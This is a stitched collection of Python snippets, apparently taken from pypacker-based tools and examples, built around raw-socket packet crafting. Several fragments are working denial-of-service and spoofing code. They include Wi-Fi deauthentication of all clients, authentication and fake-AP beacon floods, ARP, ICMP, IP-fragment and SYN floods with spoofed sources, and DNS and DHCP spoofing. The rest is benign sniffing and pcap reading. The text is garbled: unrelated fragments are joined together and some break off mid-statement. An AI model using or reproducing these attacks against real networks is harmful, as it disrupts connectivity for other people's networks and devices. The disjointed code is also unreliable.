def wifi_authdos_cb(pargs): """ Authentication frames DoS """ radiotap_ieee80211 = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst) radiotap_ieee80211_auth = radiotap_ieee80211 + auth psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) channel = int(pargs.channels.split(",")[0]) logger.debug("sending %d deauth to %r on channel %d", pargs.count, pargs.mac_dst, channel) utils.switch_wlan_channel(pargs.iface_name, int(pargs.channels.split(",")[0])) for cnt in range(pargs.count): if cnt & 15 == 0: print(".", end="") sys.stdout.flush() auth.src = pypacker.get_rnd_mac() try: psock_send.send(radiotap_ieee80211_auth.bin()) except socket.timeout: # timeout on sending? that's ok pass print("") psock_send.close()
def arp_cb(pargs): """ARP DoS, eg for switches""" #logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst) pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\ arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst, op=arp.ARP_OP_REQUEST) pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \ arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst, op=arp.ARP_OP_REPLY) psock = psocket.SocketHndl(iface_name=pargs.iface_name) for cnt in range(pargs.count): # request from various sources mac = pypacker.get_rnd_mac() pkt_arp_req.src = mac pkt_arp_req.arp.sha = mac pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4() psock.send(pkt_arp_req.bin()) # response from various sources mac = pypacker.get_rnd_mac() pkt_arp_resp.src = mac pkt_arp_resp.arp.sha = mac pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4() psock.send(pkt_arp_resp.bin()) psock.close()
def cpu_port_sniffer(self): self.routing_table = {} # prefix -> AS self.quarantined = {} # (AS, prefix) -> quarantine expire time self.blocked_as = [] self.allowed = [] # (AS, prefix) psock = psocket.SocketHndl(timeout=999999, iface_name=_CPU_PORT_VETH) while self.running: for raw in psock: self.cpu_port_handler(raw, psock)
def icmp_cb(pargs): """ICMP DoS""" pkt_icmpreq = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\ ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_ICMP) +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"A" * 1460) psock = psocket.SocketHndl(iface_name=pargs.iface_name) for cnt in range(pargs.count): psock.send(pkt_icmpreq.bin()) psock.close()
def send_pkt(pkt_num): ips = [] for i in range(0, pkt_num): ips.append(str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))) while True: for i in range(0, pkt_num): src_ip = ips[i] print('src ip : ' + src_ip) packet_ip = ip.IP(src_s=src_ip, dst_s="192.168.10.1") + tcp.TCP(dport=8888) psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3, timeout=10) psock.send(packet_ip.bin(), dst=packet_ip.dst_s) time.sleep(0.001) psock.close()
def readndump_network(file_name="bugpackets.pcap", iface_name="lo"): #print("will store bug-packets to: %s" % file_name) pcap_writer = ppcap.Writer(filename=file_name) psock = psocket.SocketHndl(iface_name=iface_name, timeout=999999) try: for bts in psock: pass_or_dump(bts, pcap_writer) except KeyboardInterrupt: pass pcap_writer.close() psock.close()
def start_collecting(self, queue_size=100000, read_timeout_sec=1): if self._collect_proc is not None: logger.debug("collect process already started") return #self._packet_queue = SimpleQueue() self._packet_queue = Queue(maxsize=queue_size) self._sockethndl = psocket.SocketHndl(iface_name=self._iface_name, timeout=read_timeout_sec, buffersize_recv=2**29) self._collect_proc = Process(target=PacketCollector._collect_cycler, args=(self._sockethndl, self._packet_queue)) logger.debug("starting packet collector") self._collect_proc.start()
def ip_cb(pargs): """ IP fragment DOS """ eth_l = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) ip_l = ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst) ip_l.body_bytes = b"A" * 4000 psock = psocket.SocketHndl(iface_name=pargs.iface_name) ip_frags = ip_l.create_fragments(fragment_len=8) for cnt in range(pargs.count): for ip_frag in ip_frags: eth_l.upper_layer = ip_frag psock.send(eth_l.bin()) psock.close()
def set_state(self, state_active=True): if self._state_active == state_active: # nothing changed logger.warning("no new state, doing nothing") return if not state_active: self._state_active = False self._socket.close() else: logger.debug("opening socket") self._socket = psocket.SocketHndl(iface_name=self._iface_name) self._responder_thread = threading.Thread( target=KnockLogic._listen_cycler, args=[self, self._socket]) self._state_active = True self._responder_thread.start()
def tcp_cb(pargs): """TCP DoS""" iptables_rules_info = """ iptables -I OUTPUT -p tcp --tcp-flags ALL RST,ACK -j DROP iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP iptables -I INPUT -p tcp --tcp-flags ALL RST -j DROP """ logger.info("For best performance set set these rules: %s", iptables_rules_info) pkt_tcp_syn = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\ ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_TCP) +\ tcp.TCP(sport=12345, dport=pargs.port_dst) # Use raw sockets to circumvent network stack psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) is_running = True def answer_cycler(): def filter_cb(pkt): try: return pkt.ip.tcp.flags == tcp.TH_SYN | tcp.TH_ACK except Exception as ex: #logger.warning(ex) pass return False while is_running: try: pkt_rsp = psock_rcv.recvp(filter_match_recv=filter_cb)[0] #logger.debug("got SYN,ACK: %r", pkt_rsp) except IndexError: logger.debug("no packets..") continue pkt_rsp.reverse_all_address() tcp_l = pkt_rsp.ip.tcp tcp_l.flags = tcp.TH_ACK tcp_l.seq, tcp_l.ack = tcp_l.ack, tcp_l.seq tcp_l.ack += 1 psock_rcv.send(pkt_rsp.bin()) answer_thread = threading.Thread(target=answer_cycler) answer_thread.start() randrange = random.randrange tcp_l = pkt_tcp_syn.ip.tcp logger.debug("sending...") input = 0x31CE #for cnt in range(pargs.count): for sport in range(0, 65536): tcp_l.seq = randrange(1000, 123123) tcp_l.sport = sport ^ input psock_send.send(pkt_tcp_syn.bin()) print("\rsent %d syn" % sport, end="") #time.sleep(0.0001) print() logger.debug("finished") is_running = False time.sleep(999) psock_send.close() psock_rcv.close()
from pypacker import psocket IFACE = "wlan0" MAC_SRC = "00:13:e8:63:f3:8f" MAC_DST = "24:65:11:85:E9:AC" IP_SRC = "192.168.178.26" FILE_IP_DST = sys.argv[2] print("destination IP addresses file: %s" % FILE_IP_DST) IP_DST = open(FILE_IP_DST, "r").read().split("\n")[:-1] print("amount addresses: %d" % len(IP_DST)) REPITITIONS = int(sys.argv[1]) print("repititiona: %d" % REPITITIONS) psock_req = psocket.SocketHndl(iface_name=IFACE, mode=psocket.SocketHndl.MODE_LAYER_2) tcp_syn = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC) +\ ip.IP(src_s=IP_SRC, dst_s="127.0.0.1", p=ip.IP_PROTO_TCP) +\ tcp.TCP(sport=12345, dport=1337) print("%r" % tcp_syn) ip = tcp_syn.ip tcp = tcp_syn.ip.tcp randrange = random.randrange for x in range(REPITITIONS): if x % 10000 == 0: print("sent %d" % x) ip_dst_str = IP_DST[randrange(0, len(IP_DST))] try: ip.dst_s = ip_dst_str
from pypacker import pypacker, utils from pypacker.layer12 import radiotap, ieee80211 from pypacker import psocket # name of monitor interface to use wlan_monitor_if = sys.argv[1] # MAC address of access point ap_mac = sys.argv[2] print("interface/ap: %s %s" % (wlan_monitor_if, ap_mac)) utils.set_wlan_monmode(wlan_monitor_if, monitor_active=False, reactivate=False) utils.set_ethernet_address(wlan_monitor_if, "24:77:03:01:5C:8D") utils.set_wlan_monmode(wlan_monitor_if, monitor_active=True) psocket = psocket.SocketHndl(wlan_monitor_if) auth_req_orig = radiotap.Radiotap() +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0) +\ ieee80211.IEEE80211.Auth(dst_s=ap_mac, bssid_s=ap_mac) beacon_orig = radiotap.Radiotap() +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) +\ ieee80211.IEEE80211.Beacon( params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")] )
def sniffer(): psock = psocket.SocketHndl(timeout=999999, iface_name = TARGET_IFACE) for pkt in psock: eth = Ether(pkt) if eth.type == 0x88b5 and eth.dst == local_mac: process_pkt(eth)
def wifi_ap_cb(pargs): """ Create a massive amount of fake APs """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) beacon_orig = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \ ieee80211.IEEE80211.Beacon( dst=b"\xFF\xFF\xFF\xFF\xFF\xFF", src=b"\xFF\xFF\xFF\xFF\xFF\xFF", params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")]) beacon = copy.deepcopy(beacon_orig) _beacon = beacon[ieee80211.IEEE80211.Beacon] mac = pypacker.get_rnd_mac() essid = "FreeHotspot" _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = bytes(essid, "ascii") _beacon.params[0].len = len(essid) _beacon.params[2].body_bytes = pack_B(channels[0]) _beacon.seq = 0 _beacon.interval = 0xFFFF # adaptive sleeptime due to full buffer on fast sending sleeptime = 0.000001 rand_mac = True rand_essid = True pargs.is_running = True logger.info("faking APs on the following channels %r", channels) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) cnt = 0 rounds = 0 PACKETS_PER_CHANNEL = 3 starttime = time.time() _beacon.params[2].body_bytes = pack_B(channels[0]) utils.switch_wlan_channel(pargs.iface_name, channels[0]) for _ in range(pargs.count): if not pargs.is_running: break if cnt & 0xF == 0: print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="") sys.stdout.flush() if time.time() - starttime > 60: rounds += 1 cnt = 0 cnt_bts = unpack_I(cnt)[0][-3:] cnt += 1 if rand_mac: mac = pypacker.get_rnd_mac()[:3] + cnt_bts _beacon.src = mac _beacon.bssid = mac if rand_essid: _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts _beacon.params[0].len = len(_beacon.params[0].body_bytes) try: _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL for cnt_ap in range(PACKETS_PER_CHANNEL): # send multiple beacons for every ap psock_send.send(beacon.bin()) _beacon.seq += 1 _beacon.ts += 0x100 #time.sleep(sleeptime) except socket.timeout: # timeout on sending? that's ok pass except OSError: sleeptime *= 10 print() logger.warning("buffer full, new sleeptime: %03.6fs, waiting...", sleeptime) time.sleep(1) psock_send.close()
psock_req = psocket.SocketHndl(iface_name=IFACE, mode=psocket.SocketHndl.MODE_LAYER_3) dns_req = ip.IP(src_s=IP_SRC, dst_s="192.168.178.1", p=ip.IP_PROTO_UDP) +\ UDP(sport=12345, dport=53) +\ dns.DNS(id=12, questions_amount=1, addrr_amount=1, queries=dns.DNS.Query(name=b"www.pr0gramm.com")) answer = psock_req.sr(dns_req)[0][dns.DNS] print("answer is: %s" % answer) psock_req.close() """ # # spoof DNS response # print("waiting for DNS request") psock = psocket.SocketHndl(iface_name=IFACE, timeout=600) filter = lambda p: p[dns.DNS] is not None and p[ip.IP].src_s == IP_SRC answer = psock.recvp(filter_match_recv=filter)[0] answer_dns = answer[dns.DNS] print("got DNS packet: %s" % answer_dns) dns_answer_send = answer.create_reverse() layer_dns = dns_answer_send[dns.DNS] layer_dns.id = answer_dns.id layer_dns.flags = 0x8180 layer_dns.queries = answer_dns.queries[0] layer_dns.answers = dns.DNS.Answer( address=pypacker.ip4_str_to_bytes("173.194.70.1")) # layer_dns.addrecords = answer_dns.addrecords[0] layer_dns.addrecords = dns.DNS.AddRecord()
import socket import pypacker.pypacker as pypacker from pypacker.pypacker import Packet from pypacker import psocket from pypacker.layer12 import arp, ethernet, ieee80211, prism from pypacker.layer3 import ip, icmp psock = psocket.SocketHndl(iface_name="lo0", mode=psocket.SocketHndl.MODE_LAYER_2, timeout=10) # send ARP request arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\ arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2", tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1") psock.send(arpreq.bin()) # send ICMP request icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin())
Check for unparsable files retrieved via network and save them to "parsefail.pcap" """ import sys import time import socket from pypacker import psocket, ppcap, utils from pypacker.layer12 import ethernet, linuxcc, radiotap from pypacker.layer3 import ip iface = sys.argv[1] print("opening (wlan?) interface: %s" % iface) utils.set_wlan_monmode(iface) sockhndl = psocket.SocketHndl(iface_name=iface) pcapwriter = ppcap.Writer(filename="parsefail.pcap", linktype=ppcap.DLT_IEEE802_11_RADIO) # pcapwriter = ppcap.Writer(filename="parsefail.pcap") raw_bytes = b"" cnt = 0 time_start = time.time() while True: if cnt % 1000 == 0: print("%d pps" % (cnt / (time.time() - time_start))) cnt = 0 time_start = time.time() cnt += 1 try:
def wifi_ap_ie_cb(pargs): """ Create fake APs using various IEs """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) beacon_orig = radiotap.Radiotap() + \ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \ ieee80211.IEEE80211.Beacon( dst=b"\xFF\xFF\xFF\xFF\xFF\xFF", src=b"\xFF\xFF\xFF\xFF\xFF\xFF", params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10), ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"), ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"), ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"), ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"), ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16), ] ) beacon = copy.deepcopy(beacon_orig) _beacon = beacon[ieee80211.IEEE80211.Beacon] mac = pypacker.get_rnd_mac() essid = "012" _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = bytes(essid, "ascii") _beacon.params[0].len = len(essid) _beacon.params[2].body_bytes = pack_B(channels[0]) _beacon.seq = 0 # adaptive sleeptime due to full buffer on fast sending sleeptime = 0.000001 pargs.is_running = True logger.info("faking APs on the following channels %r", channels) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) ie_cnt = 0 pkt_cnt = 0 PACKETS_PER_CHANNEL = 3 for _ in range(pargs.count): if not pargs.is_running: break for channel in channels: if pkt_cnt % (256) == 0: print("%d packets sent, ch: %d \r" % (pkt_cnt, channel), end="") sys.stdout.flush() _beacon.params[2].body_bytes = pack_B(channel) utils.switch_wlan_channel(pargs.iface_name, channel) #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes) pkt_cnt += 256 try: for ie_id in range(256): _beacon.params[5].id = ie_id mac = pypacker.get_rnd_mac() _beacon.src = mac _beacon.bssid = mac _beacon.params[0].body_bytes = get_random_essid() _beacon.params[0].len = len(_beacon.params[0].body_bytes) for _ in range(PACKETS_PER_CHANNEL): _beacon.seq = ie_id # _beacon.ts = x << (8*7) _beacon.ts = ie_id * 20 # time.sleep(0.01) psock_send.send(beacon.bin()) time.sleep(sleeptime) except socket.timeout: # timeout on sending? that's ok pass except OSError: sleeptime *= 10 print() logger.warning( "buffer full, new sleeptime: %03.6fs, waiting...", sleeptime) time.sleep(1) ie_cnt = (ie_cnt + 1) & 0xFF psock_send.close()
pcap = ppcap.Reader(filename="packets_ether.pcap") cnt = 0 for ts, buf in pcap: cnt += 1 eth = ethernet.Ethernet(buf) if eth[tcp.TCP] is not None: print("%d: %s:%s -> %s:%s" % (ts, eth[ip.IP].src_s, eth[tcp.TCP].sport, eth[ip.IP].dst_s, eth[tcp.TCP].dport)) pcap.close() # # send/receive packets to/from network using raw sockets # try: psock = psocket.SocketHndl(timeout=10) print("please do a ping to localhost to receive bytes!") raw_bytes = psock.recv() print(ethernet.Ethernet(raw_bytes)) psock.close() except socket.error as e: print("you need to be root to execute the raw socket-examples!") # read 802.11 packets from wlan monitor interface # command to create/remove interface (replace wlanX with your managed wlan-interface): # iw dev [wlanX] interface add mon0 type monitor # iw dev [wlanX] interface del try: wlan_reader = psocket.SocketHndl(wlan_monitor_if) print("please wait for wlan traffic to show up")
def wifi_deauth_cb(pargs): """ Deauth everyone and everything """ if pargs.channels is not None: channels = [int(channel) for channel in pargs.channels.split(",")] else: channels = utils.get_available_wlan_channels(pargs.iface_name) logger.debug("using channels: %r", channels) psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2, timeout=1) psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2) # {channel : {b"AP" : set(b"clients", ...)}} wdata = collections.defaultdict(lambda: collections.defaultdict(set)) # thread: socket1: listen for traffic, extract ap/client macs def listen_cycler(pargs_ref): while pargs_ref.is_running: try: rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0] except (IndexError, socket.timeout, OSError): logger.debug("no packets received..") continue try: pkt_ieee80211 = rtap.ieee80211 except Exception as ex: logger.warning(ex) # TODO: use channel info from radiotap? if pkt_ieee80211.is_beacon(): bssid = pkt_ieee80211.beacon.bssid if bssid in pargs.macs_excluded: #logger.debug("excluding AP: %r", bssid) continue # don't overwrite already stored client MACs if bssid not in wdata[pargs.current_channel]: # logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid)) wdata[pargs.current_channel][bssid] = set() for client in pkt_ieee80211.extract_client_macs(): bssid = pkt_ieee80211.upper_layer.bssid if bssid in pargs.macs_excluded: #logger.debug("excluding AP: %r", bssid) continue if client in pargs.macs_excluded or\ client in wdata[pargs.current_channel][bssid]: #logger.debug("excluding client: %r", bssid) continue # logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client)) wdata[pargs.current_channel][bssid].add(client) pargs.is_running = True pargs.current_channel = channels[0] layer_radiotap = radiotap.Radiotap() layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_DEAUTH) layer_deauth = ieee80211.IEEE80211.Deauth() pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth thread_listen = threading.Thread(target=listen_cycler, args=[pargs]) thread_listen.start() logger.info("first round slow start..") for cnt in range(pargs.count): seq = 0 layer_deauth.seq = seq if not pargs.is_running: break for channel in channels: # skip non-traffic channels if cnt > 0 and len(wdata[channel]) == 0: #logger.debug("skipping channel %d", channel) continue utils.switch_wlan_channel(pargs.iface_name, channel) pargs.current_channel = channel try: time.sleep(0.4 if cnt == 0 else 0.05) except KeyboardInterrupt: pargs.is_running = False break logger.info( "deauth on channel %3d (%3d APs, %3d clients, round %4d)", channel, len(wdata[channel]), sum(len(clients) for ap, clients in wdata[channel].items()), cnt) # TODO: quite slow aps = list(wdata[channel].keys()) for mac_ap, macs_clients in [[ap, wdata[channel][ap]] for ap in aps]: layer_deauth.seq += 1 layer_deauth.src = mac_ap layer_deauth.bssid = mac_ap if not pargs.nobroadcast: # reset src/dst for broadcast layer_deauth.dst = b"\xFF" * 6 # TODO: increase? # logger.debug("deauth AP: %r", mac_ap) for _ in range(5): layer_deauth.seq += 1 psock_send.send(pkt_deauth.bin()) for mac_client in list(macs_clients): # logger.debug("deauth client: %r", mac_client) layer_deauth.dst = mac_client for _ in range(2): layer_deauth.seq += 1 psock_send.send(pkt_deauth.bin()) psock_send.close() psock_rcv.close()
from time import sleep from random import uniform import os os.system("ethtool -K HA0-eth0 tx off") TARGET_DEST = '10.0.0.1' DEBUG = True def log(s): if DEBUG: print(s) send_sock = psocket.SocketHndl(timeout=999999, iface_name='HA0-eth0') def send_packet(): pkt = Ether() / IP(dst=TARGET_DEST, ttl=64, proto=6) send_sock.send(bytes(pkt)) def send_some_packets(rate, duration): n = rate * duration for i in range(n): send_packet() # Introduce some variance - otherwise the standard deviation is super small. sleep(uniform(0.8, 1.2) / rate)
import time # interface to listen on IFACE = "wlan0" # # spoof DHCP request # dhcp_param = [dhcp.DHCP_OPT_NETMASK, dhcp.DHCP_OPT_ROUTER, dhcp.DHCP_OPT_DNS_SVRS, dhcp.DHCP_OPT_NISTIMESERV] dhcp_spoof = ethernet.Ethernet(src_s="20:16:d8:ef:1f:49", dst_s="ff:ff:ff:ff:ff:ff") +\ ip.IP(src_s="0.0.0.0", dst_s="255.255.255.255", p=ip.IP_PROTO_UDP, id=1) +\ udp.UDP(sport=68, dport=67) +\ dhcp.DHCP(chaddr=pypacker.mac_str_to_bytes("20:16:d8:ef:1f:49") + b"\x00" * 10, xid=0, opts=[ dhcp.DHCPOptMulti(type=dhcp.DHCP_OPT_MSGTYPE, len=3, body_bytes=b"\x01"), dhcp.DHCPOptSingle(type=0xff) ] ) psock = psocket.SocketHndl(iface_name=IFACE) for a in range(9): print("sending DHCP request") psock.send(dhcp_spoof.bin()) mac = "08:9e:01:dd:ee:f%d" % a dhcp_spoof.src_s = mac dhcp_spoof.chaddr = pypacker.mac_str_to_bytes(mac) + b"\x00" * 10 time.sleep(1) psock.close()
import sys import time import socket from pypacker import psocket, ppcap, utils from pypacker.layer12 import ethernet, linuxcc, radiotap from pypacker.layer3 import ip from pypacker.layer4 import tcp from pypacker.layer567 import http iface = sys.argv[1] #print("opening (wlan?) interface: %s" % iface) #utils.set_wlan_monmode(iface) sockhndl = psocket.SocketHndl(iface_name=iface, timeout=99999) #pcapwriter = ppcap.Writer(filename="parsefail.pcap", linktype=ppcap.DLT_IEEE802_11_RADIO) pcapwriter = ppcap.Writer(filename="parsefail.pcap") raw_bytes = b"" cnt = 0 time_start = time.time() for bts in sockhndl: if cnt % 1000 == 0: print("%d pps" % (cnt / (time.time() - time_start))) time_start = time.time() cnt = 0 cnt += 1 try:
import queue from pypacker.layer12 import ethernet from pypacker.layer3 import ip from pypacker.layer4 import tcp from pypacker import psocket IFACE_NAME = "wlan0" MAC_SRC = "00:11:22:33:44:55" # MAC address of IFACE_NAME MAC_DST = "00:11:22:33:44:56" # MAC address of target or router IP_SRC = "192.168.178.53" # IP address of IFACE_NAME IP_DST = "192.168.178.1" # IP address of target PORT_SRC = 12345 TCP_SEQ = 1337 sock_rcv = psocket.SocketHndl(iface_name=IFACE_NAME) sock_send = psocket.SocketHndl(iface_name=IFACE_NAME) open_ports = queue.Queue() def filter_pkt(pkt): tcp_pkt = pkt[tcp.TCP] if tcp_pkt is None or\ tcp_pkt.dport != PORT_SRC or\ tcp_pkt.flags != (tcp.TH_SYN | tcp.TH_ACK) or\ tcp_pkt.ack != TCP_SEQ + 1: return False open_ports.put(tcp_pkt.sport) return True
from pypacker import psocket from pypacker.layer12 import ethernet from pypacker.layer3 import ip, icmp # send ICMP request psock = psocket.SocketHndl(iface_name="wlan0") icmpreq = ethernet.Ethernet(src_s="20:16:d8:ef:1f:49", dst_s="24:65:11:85:e9:00", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.178.27", dst_s="192.168.178.24") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin())
from pypacker import utils import logging logger = logging.getLogger("pypacker") # # sanity checks # if len(sys.argv) < 2: print("pleace specify an interface as 1st parameter") sys.exit(1) iface = sys.argv[1] utils.set_wlan_monmode(iface, monitor_active=True) psock = psocket.SocketHndl(iface_name=iface, timeout=0.5) channels = utils.get_available_wlan_channels(iface) if len(channels) == 0: # set default channels channels = [ch for ch in range(1, 12)] print("got som' channels: %r" % str(channels)) Base = declarative_base() # # data schemes # class Station(Base): __tablename__ = 'station'
"""802.11 beacon fetcher""" from pypacker import psocket from pypacker.layer12 import ieee80211, radiotap import time wlan_monitor_if = "wlan1" wlan_reader = psocket.SocketHndl(iface_name=wlan_monitor_if, timeout=999) print("please wait for wlan traffic to show up") aps_found = {} time_start = time.time() for i in range(100000): raw_bytes = wlan_reader.recv() drvinfo = radiotap.Radiotap(raw_bytes) if i % 1000 == 0: print("packets/s: %d" % (i / (time.time() - time_start))) try: beacon = drvinfo[ieee80211.IEEE80211.Beacon] if beacon is None: continue mac_ap = beacon.src1_s # print(beacon) ie_ssid = beacon.params[0].data
TARGET_IFACE = conf.iface #'H1-eth0' DELAY_MSEC = 7.5 ERROR_THRESHOLD = 1 RANGE_ABS_MAX = 255 NODELAY_TEST = True ifaces = get_if_list() if TARGET_IFACE not in ifaces: print('Could not find interface {}. Check TARGET_IFACE exists on the host.'.format(TARGET_IFACE)) #conf.iface = TARGET_IFACE local_mac = get_if_hwaddr(TARGET_IFACE) send_sock = psocket.SocketHndl(timeout=999999, iface_name = TARGET_IFACE) run = True values = [] freq = {} cache = [] def compute_var(nx): return np.var(nx) def compute_std(nx): return np.std(nx) def compute_values(): n = len(freq.keys()) vals = list(freq.values())